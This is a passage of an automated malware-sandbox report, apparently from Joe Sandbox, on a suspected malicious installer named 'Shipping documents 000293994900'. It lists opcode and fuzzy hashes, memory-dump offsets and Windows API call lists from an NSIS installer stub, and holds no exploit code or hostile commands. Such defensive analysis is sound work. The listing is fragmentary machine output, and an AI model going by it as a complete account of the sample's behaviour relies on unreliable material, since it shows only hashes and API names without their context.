                                                • Opcode Fuzzy Hash: 9f01a01dec55f467533a619ad97ceddab43c5925ca917a7916ab63c86f35f137
                                                • Instruction Fuzzy Hash: 5B118231E012149FCF65EFB888511AE7BF1EF49350B2904B9E805E7242DB35C8528791
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 59ac5e0cadce207a302f7e150835eb93c65166c1398687e31b3825c10ee12901
                                                • Instruction ID: b4d0832d8ca8d7ed58ea07d29877828789c37f3edad244774a831fbe59fde9a1
                                                • Opcode Fuzzy Hash: 59ac5e0cadce207a302f7e150835eb93c65166c1398687e31b3825c10ee12901
                                                • Instruction Fuzzy Hash: 6001F73AB002189BEB549668DC14AEF77EBABC5610F050235D519FB284EE25CC0B8BD3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d267416b26d815db7ef1840a3a474719e82cc14b0a08b6ca1767e81f9f31e8a2
                                                • Instruction ID: 5460eccb8b74e59e587b49105d785cdcb86906745a2de0c1b92cacd059776ab3
                                                • Opcode Fuzzy Hash: d267416b26d815db7ef1840a3a474719e82cc14b0a08b6ca1767e81f9f31e8a2
                                                • Instruction Fuzzy Hash: 3B01F1367000115FE719CA7C9814B5EBBDADBCA314F25843EE00EC7B62D955DD0687C1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 780458dbb7796fc50ba4c237955119f70a1de8ec50851e533ac587f08b2e9487
                                                • Instruction ID: acf4108dff3021d0fc475e82e4323899d02b42f226bfaeddbf055a66c12fd928
                                                • Opcode Fuzzy Hash: 780458dbb7796fc50ba4c237955119f70a1de8ec50851e533ac587f08b2e9487
                                                • Instruction Fuzzy Hash: 2F018031E013149FCF25EFB988512AE7BF5EF48310B2904B9E805E7242EB35D8528BA1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301015182.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_ad000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d146c012d62b50799e69983f9b519668de3e8daf9b392618dad8028a3e4e9ddc
                                                • Instruction ID: 32f565284dcd60c5411947837443950d1157860d12ad16c477a22463009a6f1e
                                                • Opcode Fuzzy Hash: d146c012d62b50799e69983f9b519668de3e8daf9b392618dad8028a3e4e9ddc
                                                • Instruction Fuzzy Hash: 3511DD75504280DFCB12CF54D5C4B15FFB2FB89314F28C6AAD84A4BA56C33AD84ACB62
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84e5cdc71acb309c2efad4b2e342205b0e4e5c07ab5f30e18e5d2623248126f7
                                                • Instruction ID: 333c9efbd77d829f2511d42a898df0462acaf4fefb41d3934c77e55b4614bc11
                                                • Opcode Fuzzy Hash: 84e5cdc71acb309c2efad4b2e342205b0e4e5c07ab5f30e18e5d2623248126f7
                                                • Instruction Fuzzy Hash: 9411C2B5D01259AFCB00CF9AD884ADEFBB4FB49310F10812AE918A7200D3746954CFA5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82df664c299bd82ad7f97a52551e65e0e6435f85ad31384882bce64c4350f806
                                                • Instruction ID: 8bfc9919bad9f0b3ac8b25a4ca7372c0bc08ad211ec22293a775c2cfe040db96
                                                • Opcode Fuzzy Hash: 82df664c299bd82ad7f97a52551e65e0e6435f85ad31384882bce64c4350f806
                                                • Instruction Fuzzy Hash: 9321CFB5D01259AFCB00CF9AD984ADEFFB4FF49310F10826AE918A7200D3786954CFA5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d371d95de274438c385b20d9c01a24334a4867a06f73081e4faba854473eb018
                                                • Instruction ID: 4f426b66f09283d7612ad1bfdfad14312d8c1e0009bc9c579fe4ffae63ef0c46
                                                • Opcode Fuzzy Hash: d371d95de274438c385b20d9c01a24334a4867a06f73081e4faba854473eb018
                                                • Instruction Fuzzy Hash: EC01DF357440518FE7059E3CD964BAA2BE7DBCA744F20857AE10EDB392EA15DC078781
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31e4ac8ce10dfba784498da190bfb54fd5cec55514ee1a6d8e96d44fc2015536
                                                • Instruction ID: 3a70d034487bfea1350d1e97b669f7673f272e98f6769381d621c952d7ffaa1f
                                                • Opcode Fuzzy Hash: 31e4ac8ce10dfba784498da190bfb54fd5cec55514ee1a6d8e96d44fc2015536
                                                • Instruction Fuzzy Hash: 8E01FF343002555BCB265AB9A9226AA7A9BDFC2314F00467ED459CB356DB19CC0B8B91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fbabe5bcaba12f583b676e8cf82a066a6878ab5ada155b3703a6778bb9f6331b
                                                • Instruction ID: eebf03137e0d850a4b6788c411fdfbfdc7da17822deef7e4ca1647961d835202
                                                • Opcode Fuzzy Hash: fbabe5bcaba12f583b676e8cf82a066a6878ab5ada155b3703a6778bb9f6331b
                                                • Instruction Fuzzy Hash: E101A93A7000115BEB18DA6DD814B1FE2CACBC9764F20843AE10EC7B55EA65DD0643C1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d826dea162ba48b9d5c59cb5a9e93d7ef7d5b077b1a95387b5259b0ed3f4279
                                                • Instruction ID: 85510949a934958569446726f2e80f30c5a6c4aad0c5020527a0353c5921dd2a
                                                • Opcode Fuzzy Hash: 5d826dea162ba48b9d5c59cb5a9e93d7ef7d5b077b1a95387b5259b0ed3f4279
                                                • Instruction Fuzzy Hash: 5501AF357004108BEB159B6DD455B2F77DADBC9B65F208839E50EC7340EE25DC0B4391
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2060928e539b480783f4d27b4f84a2a46289660cff7ce7a2188bf889be8cc26c
                                                • Instruction ID: e3dadb9ddc79801111c329d34f06ba0c81757d316cacc6c9e7da9a1272adaa24
                                                • Opcode Fuzzy Hash: 2060928e539b480783f4d27b4f84a2a46289660cff7ce7a2188bf889be8cc26c
                                                • Instruction Fuzzy Hash: 4301A9357400108FE708DA2CD459B9A73E7DBC9754F608839E10AD7391EA25EC078381
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5cf9f85f6843691855c1b3b5614666796293a704c6e3b64d44b89fc0931150c2
                                                • Instruction ID: 0f34654b998fc606eccecad629b30965a422969d5e0e50363be67f3fa2ce59d1
                                                • Opcode Fuzzy Hash: 5cf9f85f6843691855c1b3b5614666796293a704c6e3b64d44b89fc0931150c2
                                                • Instruction Fuzzy Hash: 0AF024343002155BCB2166BEF92266A76CEDFC2314F00493ED00ACB315DB24DC078B91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 782338e8b0fdbd43b47f8e29b745c352a9d37bfba97652f26d75b4caa5c82f74
                                                • Instruction ID: 9334155e13f7f40e6a49543164a030ab3f1c8d0e7e093b86fbf212fc930b8f7b
                                                • Opcode Fuzzy Hash: 782338e8b0fdbd43b47f8e29b745c352a9d37bfba97652f26d75b4caa5c82f74
                                                • Instruction Fuzzy Hash: EAE09270A08348EFEB01DE7889496897BB99B02244F2045A6D448DB682E637C94A8791
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 480d756836a946f9b9d27bf4d9339a3df77aed15f7f530a37834d11f050256cd
                                                • Instruction ID: 898184b68a2e58c00509ba788e1478f926c8ff60be498253583d0ea434b270aa
                                                • Opcode Fuzzy Hash: 480d756836a946f9b9d27bf4d9339a3df77aed15f7f530a37834d11f050256cd
                                                • Instruction Fuzzy Hash: 5FD02B3120D3949FD336576C68446E57FED6B41290F08426EF446C7283DB50A811C7C1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 50122f7e6dcffc7495d5ab280f741339c72f031b7305916e5a5e49eedaac08ef
                                                • Instruction ID: 7620a52ec656e1089620a4ff2a6af79aa83ec2b0d787955317340e3a085b74ed
                                                • Opcode Fuzzy Hash: 50122f7e6dcffc7495d5ab280f741339c72f031b7305916e5a5e49eedaac08ef
                                                • Instruction Fuzzy Hash: F9D05E34205B509BD324D62CD544A52B7D9BB48714B944619F44783A40CB60BC01C7C0
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                                                • GetDlgItem.USER32(?,00000408), ref: 00404B31
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                                                • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                                                • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                                                • DeleteObject.GDI32(00000000), ref: 00404C04
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                                                • ShowWindow.USER32(?,00000005), ref: 00404D5E
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                                                • GlobalFree.KERNEL32(?), ref: 00404F3E
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
                                                • ShowWindow.USER32(?,00000000), ref: 004050DD
                                                • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                                                • ShowWindow.USER32(00000000), ref: 004050EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
                                                • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                                                • Opcode Fuzzy Hash: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
                                                • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                                                APIs
                                                • #17.COMCTL32 ref: 00403377
                                                • SetErrorMode.KERNEL32(00008001), ref: 00403382
                                                • OleInitialize.OLE32(00000000), ref: 00403389
                                                  • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                  • Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                  • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
                                                  • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                                                • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033D9
                                                • CharNextW.USER32(00000000,00434000,00000020), ref: 00403400
                                                • GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 00403509
                                                • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351A
                                                • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403526
                                                • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353A
                                                • lstrcatW.KERNEL32(00436800,Low), ref: 00403542
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403553
                                                • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355B
                                                • DeleteFileW.KERNEL32(00436000), ref: 0040356F
                                                • OleUninitialize.OLE32(?), ref: 0040361F
                                                • ExitProcess.KERNEL32 ref: 0040363F
                                                • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364B
                                                • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403657
                                                • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403663
                                                • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366A
                                                • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
                                                • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
                                                • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                                                • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                                                • ExitProcess.KERNEL32 ref: 004037BA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                • API String ID: 4107622049-1875889550
                                                • Opcode ID: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
                                                • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                                                • Opcode Fuzzy Hash: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
                                                • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E
                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,00436800,75922EE0,00434000), ref: 00405799
                                                • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,75922EE0,00434000), ref: 004057E1
                                                • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,75922EE0,00434000), ref: 00405804
                                                • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,75922EE0,00434000), ref: 0040580A
                                                • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,75922EE0,00434000), ref: 0040581A
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                                                • FindClose.KERNEL32(00000000), ref: 004058C9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: \*.*
                                                • API String ID: 2035342205-1173974218
                                                • Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                                                • Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-2843079600
                                                • Opcode ID: b997bf234076a64b452057b5b0fea10143e455e5d60a2cc0db19d0df343aaf38
                                                • Instruction ID: 915b19fc1febd248788bdd1a3e5e306a3dfe974d3af11392b32601685da0b5c1
                                                • Opcode Fuzzy Hash: b997bf234076a64b452057b5b0fea10143e455e5d60a2cc0db19d0df343aaf38
                                                • Instruction Fuzzy Hash: 80122B34A00219CFDB24EF69C990A9EB7F2BF88304F208969D409AB755DF349D46CF91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
                                                • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                APIs
                                                • FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,75922EE0,00405790,?,00436800,75922EE0), ref: 00406236
                                                • FindClose.KERNEL32(00000000), ref: 00406242
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: WB
                                                • API String ID: 2295610775-2854515933
                                                • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                                                • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405330
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                                                • GetClientRect.USER32(?,?), ref: 0040537C
                                                • GetSystemMetrics.USER32(00000015), ref: 00405384
                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                                                • ShowWindow.USER32(?,00000008), ref: 00405420
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405441
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                                                  • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405493
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                                                • CloseHandle.KERNEL32(00000000), ref: 004054A8
                                                • ShowWindow.USER32(00000000), ref: 004054CC
                                                • ShowWindow.USER32(?,00000008), ref: 004054D1
                                                • ShowWindow.USER32(00000008), ref: 0040551B
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                                                • CreatePopupMenu.USER32 ref: 00405560
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                                                • GetWindowRect.USER32(?,?), ref: 00405594
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                                                • OpenClipboard.USER32(00000000), ref: 004055F5
                                                • EmptyClipboard.USER32 ref: 004055FB
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                                                • GlobalLock.KERNEL32(00000000), ref: 00405611
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                                                • CloseClipboard.USER32 ref: 00405656
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
